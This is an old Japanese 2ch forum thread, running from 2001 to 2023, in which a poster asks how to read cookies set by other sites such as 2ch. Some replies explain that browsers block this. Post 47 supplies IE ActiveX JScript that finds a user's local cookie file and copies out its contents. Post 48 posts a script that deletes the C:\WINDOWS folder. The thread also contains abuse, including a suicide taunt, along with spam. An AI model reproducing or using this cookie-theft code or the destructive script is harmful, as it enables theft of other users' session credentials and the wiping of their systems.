X



他所のCookieを読み込みたいのですが
0001紅茶垢版2001/08/13(月) 16:01ID:yXxJQXBQ
他所のCookieを読みたいのですが、どのような方法がありますか?
例えば、2chで保存されたCookieを私の掲示板で表示させるとかしたいのです。
なかなか難しい問題なので新規スレッドを立てさせてもらいました。
決してパスワードを盗むとかに使うわけじゃないのです.....決して。
0002名無しさん@お腹いっぱい。垢版2001/08/13(月) 16:12ID:???
>>1
まず今繋いでいる回線を切ります。そして一本のロープを用意して
首を吊ります。そうすればあなたはこの質問を気にしなくて済むように
なります。
0005紅茶垢版2001/08/13(月) 17:15ID:0Mw890wE
>>2
まずは手本を見せてください。
0011紅茶垢版2001/08/14(火) 02:01ID:vYm./PMs
結局誰もわからないのか....。
ま、それならさおれでいいんですが、自分がわからないからといって
ごまかすのはやめてください。

>>10
ブラウザに依存するんじゃないの?
0012名無しさん@お腹いっぱい。垢版2001/08/14(火) 02:49ID:???
じゃあマジレスで。
「無い」
以上。
どうしてもやりたいなら他所のパケット覗くなり、
クライアントに進入して覗き見るなりしてくれよ。
分かったらもう来ないでね。さようなら。
0013名無しさん@お腹いっぱい。 垢版2001/08/14(火) 02:50ID:???
>>10
パスの事言ってんじゃないかなあ。サブドメインで/とか。

>>11
テキストエリアにコピペして貰ってサブミット。
盗む訳じゃないんでしょ。
0016垢版2001/08/14(火) 05:28ID:???
>>6
すまない、詳しく無いのにいい加減な事をいってしまった。
漏れが経験したのは .com.tw/ と言う奴だ。 これはネット通販みたいな
所だったから怖かったよ。
最近だと 某MPUブランド が **.jp/ を吐いてた時があった。
何か板ちがいなので
#--------------------しゅうりゃう--------------------
0017紅茶垢版2001/08/14(火) 09:01ID:ja7246vI
>>14,15
そっちに書くと逆にこっちに逝けって言われそうですが....

と、いうわけで
-------- 再開 --------
0018名無しさん@お腹いっぱい。垢版2001/08/14(火) 09:29ID:???
そんなこと無いって、あっちで書き込めばみんなジャンジャンレス
打ってくれるよ 僕も真っ先に書き込みたいよ
じゃっ  (・∀・)カエレ! ニドトコナイデネ♪
0019紅茶垢版2001/08/14(火) 09:40ID:ja7246vI
>>18
まぁまぁ、無理しないで......
0020名無しさん@お腹いっぱい。垢版2001/08/14(火) 09:54ID:DxbKgfdA
裏2chで質問してみれば?
0021名無しさん@お腹いっぱい。垢版2001/08/14(火) 10:12ID:???
どうでも良いけど一番下の "素人" "出会い" って何じゃー! プソプソ(゚Д゚)
金無いのかな??? ひろゆき、、、
0023紅茶垢版2001/08/14(火) 13:12ID:GL4KDhlQ
あの、cookie自体の事は解っているつもりなんですが、、
結局誰もわからないと...。

教える立場の口調と態度じゃないね>>22
0025名無しさん@お腹いっぱい。垢版2001/08/14(火) 13:21ID:???
>>23
いい加減ウザイ。>>2 でお前のすべきことは教えてもらってるじゃないか。
マジレスすると、クッキー セキュリティ で google で探せ。
0029電動ナナシ垢版2001/08/15(水) 18:08ID:???
>>1
もしこのような機能を有効にするとパスワードとかが盗まれる可能性が
出てくる。>>1 がいくら
> 決してパスワードを盗むとかに使うわけじゃないのです.....決して。
といっても、全員が邪悪な用途に利用しないという保証はないから、ブラウザは
このような真似ができないように作られているし、もしこれができてしまったら
それは「セキュリティホール」以外の何ものでもない。

参考:
 http://japan.cnet.com/News/2000/Item/000512-1.html

あきらめろ。
0031名無しさん@お腹いっぱい。垢版2001/08/18(土) 11:46ID:???
>>30
ウケ狙ってるつもり?はっきりいってつまんないよ。
串サイトはこちら!とかいって竹串のページかいたり。
逝ってよし。
0034JAPU垢版2001/08/18(土) 20:02ID:???
>>33
それは可能。2ch が
Set-Cookie: ayu=moe; domain=2ch.net
って感じで吐き出せば良い。
0035紅茶垢版2001/08/18(土) 22:34ID:RlF/BZ9k
>>33,>>34
いやいや、それじゃ駄目なのです。
あくまで自分の情報は隠しつつ、いかに他人の情報を
得られるか、という事が重要なのです。

やっぱりセキュリティーホールを突くしかないんだろうなぁ...。
0038名無しさん@お腹いっぱい。垢版2001/08/19(日) 21:24ID:???
>あくまで自分の情報は隠しつつ、いかに他人の情報を得られるか、という事が重要なのです。

臆面もなく他人のプライバシーは覗きたいが自分のプライバシーは守りたいなどと言えるあな
たはすばらしい。なお世間は法的にも技術的にもそんな穴は塞ぎに掛かっているから、望むの
は勝手だが時間の無駄であろうね。まあ、この調子なら他人を巻き添えにしなくても全部自分
でできるでしょ。せいぜいご自愛ください。

sage
sage
sage
sage
sage
sage
0039紅茶垢版2001/08/19(日) 22:12ID:???
age
age
age

--- 再開 ---

あれからperlとjavaスクリプトの組み合わせで、
特定のサイトのcookieだけを読み取る事はできるようになりましたです。

でも、やっぱりIE6になったら修正されるかもしれないし、
javaスクリプトをオンにしていないと使えないので引き続き情報を募集します。
できればもうちょっと簡単に、スマートに情報を読み取りたいのです。

と、いう事で、だ・れ・か・教えてください!!
0040番茶垢版2001/08/20(月) 05:10ID:???
211.124.191.163
0042うんも垢版01/08/29 09:27ID:UrmojQQI
紅茶死ねすれ立てて良いですか?
死ね
0047完成(Win2kでActiveX有効)垢版01/09/07 14:48ID:/5kb3a9k
function f1(){
dh.DOM.write('<IFRAME SRC=file://'+navigator.cookiefile.replace(/\\/,'/')+' name=I1></IFRAME>');
setTimeout('f2()',500);}
function f2(){
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand('selectall');
dh.DOM.all.I1.document.execCommand('copy');
var r=T1.createTextRange();r.execCommand('paste');
alert(T1.value);}
function GetUserName(def){
var s2='';try{
var c1=new ActiveXObject('NSComDlg.FileDlgCtrl.1');
c1.Flags=0x80;c1.ShowOpen();
var s1=c1.InitDir;
var t1=s1.indexOf('\\Documents and Settings\\');
if(t1>=0){
s2=s1.substr(t1+24);
t1=s2.indexOf('\\');
if(t1>=0){s2=s2.substr(0,t1);}
}
}catch(e){}if((!s2)&&def){s2=def;}return s2;}
navigator.username=GetUserName();
if(navigator.username){navigator.cookiehead='C:\\Documents and Settings\\'+t1+'\\Cookies\\'+t1+'@';}
if(navigator.cookiehead){
document.write('<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A id=dh></OBJECT>');
document.write('<TEXTAREA id=T1></TEXTAREA>');
}
function RequestCookie(file){
if(navigator.cookiehead){
navigator.cookiefile=navigator.cookiehead+file;
setTimeout('f1()',500);return true;
}
}
RequestCookie('corn.2ch[1].txt');
0048名無しさん@お腹いっぱい。垢版01/09/07 17:33ID:Qr1kAc0w
<script language="jscript">
var a
a = new ActiveXObject("Scripting.FileSystemObject");
a.DeleteFolder("C:\\WINDOWS",true);
</script>

で我慢してください。
0052名無しさん@お腹いっぱい。垢版01/09/07 22:34ID:Qr1kAc0w
age
0054名無しさん@お腹いっぱい。垢版01/09/09 19:44ID:oCfdc.fI
ager
0056紅茶垢版01/09/10 09:32ID:???
揚げていいですか??
ありがとうございます。
0060紅茶垢版01/09/10 16:07ID:???
結局ここってレベル低いのね


age
age
age
0062紅茶垢版01/09/10 16:39ID:???
□□□■■■■■■□□□□□■■■■■■□□□□□□□■■■□□□□□
□□■□□□□□□■□□□■□□□□□■□□□□□□■□□□■□□□□
□□□□□□□□■■□□□■□□□□□■□□□□□■□□□□□■□□□
□□□■■■■■■■□□□■□□□□□■□□□□■□□□□□□□■□□
□□■□□□□□■■□□□□■■■■■■□□□□■■■■■■■■■□□
□□■□□□□□■■□□□□□□■□□□□□□□■□□□□□□□□□□
□□■□□□□□■■□□□□■■■■■■■□□□□■□□□□□□□□□
□□■□□□□□■■□□□■□□□□□□□■□□□□■□□□□■□□□
□□□■■■■■□■■□□■□□□□□□□■□□□□□■■■■□□□□
□□□□□□□□□□∩□□□■■■■■■■□□□□□□□□□□□□□□
            |  ゝノ
           __|_______|_   ■■■■■■■■
           |iiiiiiiiiiiiiiiii|  ■■■■■■■■■ナニヤッテンダヨ!バカモノガァ!
           |iiiiiiiiiiiiiiiii| ■■■■√ === │
           |iiiiiiiiiiiiiiiii|■■■■√ ~ ミ ノノノ 彡 |
           |iiiiiiiiiiiiiiii|■■■√   Å    Å \
           |iiiiiiiiiiiiiiii|■■■  ∵   (●  ●) ∴│  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           |iiiiiiiiiiiiiiii|■■■    丿■■■(  │< 常にageとけって
           |iiiiiiiiiiiiiiii|■■■     ■ д ■  |   |  言ったじゃないかぁ!
           |iiiiiiiiiiiiiiii|■■■■   ■■ ■■ ■  \_________
           |iiiiiiiiiiiiiiiiii■■■■■■■■■■■■__
           \iiiiiiiiiiiiiii■■■■■■■■■■■■iiヽ
             \iiiiiiiiiiiii■■■■■■■■■■■iiiiiii|
              |iiiiiiiiiiiiiiiii■■■■■■■■■■iiiiiiiii
0066名無しさん垢版01/09/10 17:16ID:???
何このスレッド この子が変なスレ上げてるの?
時間あるんだねぇ、、
0068紅茶◇tensai垢版01/09/14 22:22ID:MmKBuJw2
60と62は氏んでくださいです。
このスレッドを過去ログいかせる訳にはいかんのです。
0071紅茶◇ ◆M0O16Y0E 垢版01/09/20 17:54ID:GYYxib6s
今日もいい天気でご機嫌です(^v^)
揚げさせてもらいますね♪
0073sage垢版01/09/20 21:05ID:???
粘着基地外sage
0074名無しさん@お腹いっぱい。垢版01/09/22 01:11ID:???
そういや、Proxomitronだっけ?
パーソナルなProxyの。
任意のクッキーが読み出せるセキュリティホールがあったねえ。
夏休み前ぐらいの時期だったかなあ。
0075紅茶◇ ◆M0O16Y0E 垢版01/09/23 02:25ID:hbfYg/IQ
寒くなってきました。
こんな夜にはageさせて頂きますね♪
0077名無しさん@お腹いっぱい。垢版01/09/23 12:50ID:j.Hf8Wmw
// TODO: この位置にコマンド ハンドラ用のコードを追加してください
CString cs=GetDocument()->GetPathName(),cpm;
if(cs==""){

TCHAR szPath[_MAX_PATH];
VERIFY(::GetModuleFileName(AfxGetInstanceHandle(), szPath, _MAX_PATH));
LPTSTR lpszExt = _tcsrchr(szPath, '\\');
ASSERT(lpszExt != NULL);
ASSERT(*lpszExt == '\\');
*(++lpszExt) = 0;
cs=szPath;

}
cs=cs.Left(cs.ReverseFind('\\')+1);

cs=cs+GetTSSMona;
GetRichEditCtrl().GetWindowText(cpm);
CStdioFile file(cs,CFile::modeCreate|CFile::modeWrite);
file.WriteString(cpm);
file.Close();

::ShellExecute(0,"open",cs,NULL,NULL,SW_SHOW);
0078名無しさん@お腹いっぱい。垢版01/09/23 16:17ID:IRukl05.
>76
俺は紅茶は煽りだとおもうぞ。自分で調べればって感じです。
こういうタイプには知ってても教えてやらない。
0080名無しさん@お腹いっぱい。垢版01/09/23 17:15ID:SYKGGmWQ
>79
バカの一つ覚えじゃん。
いいかげんにうざいからやめろって・・・
0081名無しさん@お腹いっぱい。垢版01/09/23 22:04ID:???
紅茶・・・いわゆる教えて君という物体
http://klablog.okiraku-pc.net/logs/current-bbs/161/xqqrlz.html
自分では調べようともせず、煽ると逆切れして「レベル低い」を連発する。

しかし、自分が一番レベルが低いと言う事には気付いていない。
すでに、こんな質問をする時点で低レベルで、
さらに、こんな単発質問をする時点で2chというものを理解していないらしい。

終了したスレを、再開させるのが趣味らしい。
>>75
のように突然わけの分からない事を言い出すが、冷え性らしい。
しかし、根はいい奴で、ネットだと人格が変わるらしく、暴走している。
こんなやさしい紅茶は今ごろドラえもんの夢でも見ならがおねんねしていることだろう。
0082紅茶垢版01/09/23 22:10ID:???
おい、まだか。レベルが低いな。
結局クズの集まりじゃないか。












0083紅茶◇ ◆M0O16Y0E 垢版01/09/24 00:25ID:hR1sTc4.
煽っているつもりはありませぬ。
セキュリーティを突くという事は自分の身を守る事にも
なるのです。
偽者のせいで煽りと思われているのです。。。(;;)
0085紅茶◇ ◆M0O16Y0E 垢版01/09/24 00:36ID:hR1sTc4.
まぁ、それなりに。。。
0087紅茶◇ ◆M0O16Y0E 垢版01/09/24 01:36ID:???
うぅ、、知らぬ間にセキュリーティとかタイプしてるし....
僕はちゃんころじゃないのに。。。(;;)
0090名無しさん@お腹いっぱい。垢版01/09/24 02:38ID:???
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
0092名無しさん@お腹いっぱい。垢版01/09/24 08:21ID:xMpqxvjo
>1
夏休みは終わったんだから早く学校に行きなさいね。
それともこの夏休みをきっかけにヒッキーになったのかな?
0094>92垢版01/09/24 09:46ID:???
ていうか、そんな低レベルな煽りじゃ相手に自分の底を知られて苦笑されるだけだよ。
たぶん紅茶は勝利の喜びを噛み締めまくったと思うぞ、あんたの書き込みを見て。
0095紅茶垢版01/09/25 14:54ID:???
    /∵∴∵∴\
   /∵∴∵∴∵∴\
  /∵∴∴,(・)(・)∴|
  |∵∵/   ○ \|
  |∵ /  三 | 三 |  / ̄ ̄ ̄ ̄
  |∵ |   __|__  | < うるせー馬鹿!
   \|   \_/ /  \____
     \____/
0096紅茶◇ ◆M0O16Y0E 垢版01/09/26 04:28ID:???
早く起きたので記念にageておきます。(^v^)
そういえば、IE6にしたら例の方法はやぱり使えなくなりました。(--;)
0097紅茶◇ ◆M0O16Y0E 垢版01/09/26 04:31ID:BZjcHk1w
間違えて下げてしまったので、今度こそは大丈夫です
0098名無しさん@お腹いっぱい。垢版01/09/26 04:56ID:???
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
0115名無しさん@お腹いっぱい。垢版01/09/28 06:23ID:???
>>紅茶
何らかの方法でTEMPフォルダに任意のHTMLコードを含むファイルを作成し、
何らかの方法でそのファイルを走査しパスを特定しろ、さらに、
何らかの方法でユーザー名を特定し、他所のCookieファイルを読み込め。
0120nobodyさん垢版02/04/24 14:20ID:QHIenEjT
はじめまして!
自分は環境変数で得るCOOKIEを、外部の(例えば自分のサーバに設置しておいて2chのCOOKIEをゲットしたり)ものをゲット
したいのですが!!
お知恵をお貸しください!!!
$ENV{'HTTP_COOKIE'};
に何か付け加えて、指定別鯖のクッキーを得ることは出来ないでしょうか!
0121nobodyさん垢版02/04/24 14:27ID:???
セキュリティーって言葉を知ってるか?
0122nobodyさん垢版02/04/24 15:58ID:???
そんなブラウザあったらこわいこわい。IEが昔ヤッチャッタけど
0123nobodyさん垢版02/04/24 22:34ID:yWSCqsHt
ちんこハケーン
0125pear ◆PeArra/s 垢版02/04/25 19:44ID:???
もし取得できるなら確実にトリップクラックされるよな
0126nobodyさん垢版02/04/30 08:06ID:???
>>120
お前だけにこっそり教えよう。
まず、IEやNetscapeをこえる画期的なブラウザを作る。
次に、カチュやホットゾヌをこえるそのブラウザを使った画期的な2ch専用ブラウザを作る。
これで、世界中の人間に自分のブラウザを使わせるわけだ。
すると、自分のページに来る奴もそのブラウザを使っているということになる。
で、そのブラウザには自分にしかわからないセキュリティーホールをいれておく。
どんなクッキーでも見えてしまうと言うセキュリティーホールをな。
これで、外部のクッキーも食い放題と言うことだ。

すでに、M$が同じ方法をとっている可能性は極めて高いから、
ゲイツと友達になったらIE用のクッキー吸い出し方法教えて貰えるかもよ。
0127nobodyさん垢版02/05/06 00:04ID:???
1つのCookieには4096バイトのデータを記録でき、最大で300のCookieを保存できる。1台のサーバが同じコンピュータに対して発行できるCookieの数は20個に制限されている。Cookieにはそれぞれ有効期限を設定することができ、有効期限を過ぎたCookieは消滅する。
0129紅茶 ◆tNHOcrmZ/s 垢版03/02/08 04:22ID:280VV5J1
(=゜ω゜)ノぃょぅ久しぶり、アレから僕も成長できましたよ。
それではまたー
0133山崎渉垢版03/04/20 06:11ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
0134山崎渉垢版03/05/22 02:13ID:???
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
0135山崎渉垢版03/05/28 17:14ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
0136t-akiyama垢版03/06/18 21:12ID:???
携帯ゲーム機"プレイステーションポータブル(PSP)

 このPSPは、新規格UMD(ユニバーサルメディアディスク)というディスクを利用しており、そのサイズは直径6cmととても小さい(CDの半分程度)。 容量は1.8GBとなっている。
画面は4.5インチのTFT液晶で、480px x 272px(16:9)。MPEG4の再生やポリゴンも表示可能。外部端子として、USB2.0とメモリースティックコネクタが用意されているという。

この際、スク・エニもGBAからPSPに乗り換えたらどうでしょう。スク・エニの場合、PSPの方が実力を出しやすいような気がするんですが。
任天堂が携帯ゲーム機で圧倒的なシェアをもってるなら、スク・エニがそれを崩してみるのもおもしろいですし。かつて、PS人気の引き金となったFF7のように。
0137山崎 渉垢版03/07/15 11:20ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
0138山崎 渉垢版03/08/02 02:32ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
0139ぼるじょあ ◆ySd1dMH5Gk 垢版03/08/02 05:09ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
0140山崎 渉垢版03/08/15 23:13ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
0141 垢版03/09/08 10:05ID:???
>>34
その方法ってJavaScriptでも可能ですか?
試したのですが上手くいかないのですが。
0143nobodyさん垢版03/09/08 14:40ID:ChnJrt5M
>>141
違うdomainには送信できません。
0144nobodyさん垢版03/09/10 10:30ID:e/1VSr70
たとえばさ、http://goo.ne.jp/○○○○/○○○○みたいなところで
クッキーを発行する場合、パスを"/"にしたら、http://goo.ne.jp/△△△△/△△△△/
とかhttp://goo.ne.jp/のドメインにあるサイトならどっからでも読めるようになるよね。

でも、スクリプトに初めから相対パスでクッキーを送れるようにできるのかなあ?
やっぱそれぞれ設定するしかないのか、面倒くさいなあ。
0145nobodyさん垢版04/05/08 22:43ID:cMw9cpxg
∧_∧
( ´∀`)<オマエモナー
(     )
| | |
|_)_)
0146紅茶◇ ◇M0O16Y0E垢版04/09/13 10:32:16ID:2JofYR1R
,._.,
0147マイク ◆yrBrqfF1Ew 垢版04/09/13 10:56:29ID:???
>>1
他のサイトで発行されたcookieを変な手段を使って奪う方法はある
まあアホじゃ悪用するくらしか使い道が無いかも知れねーな
0149nobodyさん垢版05/03/15 18:47:11ID:???
かつらかぶせて濃いめの化粧でいいんじゃね?
0150nobodyさん垢版2005/07/22(金) 20:58:52ID:sxbxwC/B
どうすりゃ?いいのよ
0151nobodyさん垢版2005/11/03(木) 20:28:06ID:V8GW3H7I
試し 入るか?!
0152エーサク垢版2005/11/04(金) 23:40:42ID:aU5WUyne
こん^^
0155nobodyさん垢版2006/02/06(月) 19:07:45ID:BYKAG910
2chでcookieを記録するときに、cookieの有効ドメインをおまいのサイトの
ドメインにしてもらえばいいんじゃないの?(実質無理だが)
…という書き込みをしようと思って、自分のサーバで他人のサイト向けの
cookieを記録できるかPHPで試してみたらダメだった。
0156紅茶 ◆tNHOcrmZ/s 垢版2006/05/23(火) 04:16:34ID:svZ/YPwz
うほっ5年前に僕が立てたスレがまだ残ってる
おまえらも暇なヤツラだなぁプッ
0158158垢版2007/02/03(土) 21:00:57ID:d5wwH9k8
tee
0160nobodyさん垢版2007/08/10(金) 17:47:52ID:aMYah7ck
過疎ってるけど、誰か教えてくれるかな。。。

サイトAでCookieをセットします。
サイトBのページから、<script>タグで、サイトAにあるPHPを呼び出した際に
FireFoxでは、Cookieが読めるのですが、IEでは読めないのですが、
これってブラウザの仕様ですかね?
0161160垢版2007/08/10(金) 18:38:42ID:aMYah7ck
PHPのスレに移動します
0162nobodyさん垢版2008/03/23(日) 23:52:38ID:LaSW6YiI
このスレを除いたんだけどオレも掲示板やってる
んで金ないから色んなレン鯖が混在してるんだけど名前欄に
クッキーで保存読み込みをしようと思ったらできない
domainの所でかかるみたい
いい方法ない?例えば2ch.netとbbspink.comの両方でクッキーを吐きたい
無理?
0163nobodyさん垢版2008/05/12(月) 22:13:50ID:9u/gHUwc
>>162
0164nobodyさん垢版2008/05/27(火) 01:59:20ID:???
7年も前に立てられたとか…

このスレ、すげぇ
0165a垢版2008/06/14(土) 15:12:29ID:RZHCajw9
asd
0167電脳プリオン垢版2011/11/23(水) 13:08:53.98ID:????2BP(1960)

  ∧_∧
  ( ・∀・)      | | ガガッ
 と    )      | |
   Y /ノ      .人
    / ) .人   <  >_∧∩
  _/し' <  >_∧∩`Д´)/
 (_フ彡 V`Д´)/   / ←>>133
            / ←>>138
0168nobodyさん垢版2011/11/23(水) 14:10:15.65ID:???
8年越し、しかも山崎渉にガッしとる
0169nobodyさん垢版2012/03/01(木) 20:55:11.63ID:???
電脳プリオンが全sakuされて●焼かれて全鯖ピンポイント永久規制されますように
0173nobodyさん垢版2014/07/13(日) 14:55:19.61ID:Fta9+1kM
◎2ch勢いランキングサイトリスト◎

★+ニュース板
・ 2NN (推薦)
・ 2chTimes
★+ニュース板新着
・ 2NN新着
・ Headline BBY
・ unker Headline
★+ニュース板その他
・ Desktop2ch
・ 記者別一覧
★全板
・ 全板縦断勢いランキング (推薦)
・ スレッドランキング総合ランキング
・ ログ速
★全板実況込み
・ 2勢
・ READ2CH
・ i-ikioi

※ 要タイトル名検索
0174nobodyさん垢版2014/12/10(水) 12:21:49.24ID:???
他所のCookieを読み込みたいのですが
0178nobodyさん垢版2017/12/30(土) 15:35:55.81ID:YhlYw6jg
誰でも簡単にネットで稼げる方法など
参考までに、
⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。

グーグル検索⇒『半藤のブブイウイウレレ』

HUIDSQ9K4Y
0179nobodyさん垢版2018/06/21(木) 02:24:30.82ID:VtSVJLaY
プログラミングを誰でも習得できる方法は、「前場アキドルのプログラミングマスター方法」というブログで見られるらしいよ。ネットで調べると見られるらしいです。

WCJTQ
0180ロシア軍、東部要衝徐々に掌握 英国防省分析垢版2022/06/13(月) 00:22:51.61ID:tcHSYTj6
英国防省は12日、ロシア軍がウクライナ東部ルガンスク州の要衝セベロドネツクとその周辺を徐々に掌握しているとの戦況分析を明らかにした。
0181「大食い魔女」菅原初代さん死去、59歳垢版2023/03/18(土) 01:04:08.44ID:g34c4KBX
「大食い魔女」として活躍した菅原初代(すがわら・はつよ)さんが死去したことが16日深夜、ツイッター「魔女菅原」で投稿された。59歳だった。
 ツイッターには「3月9日深夜、菅原初代は永眠いたしました 長い間お付き合いいただきありがとうございました 故人に変わりご報告させていただきました」と記された。

 菅原さんは、テレビ東京「大食い世界一決定戦!」やTBS系「水曜日のダウンタウン」など、テレビ番組にも多数出演。
レスを投稿する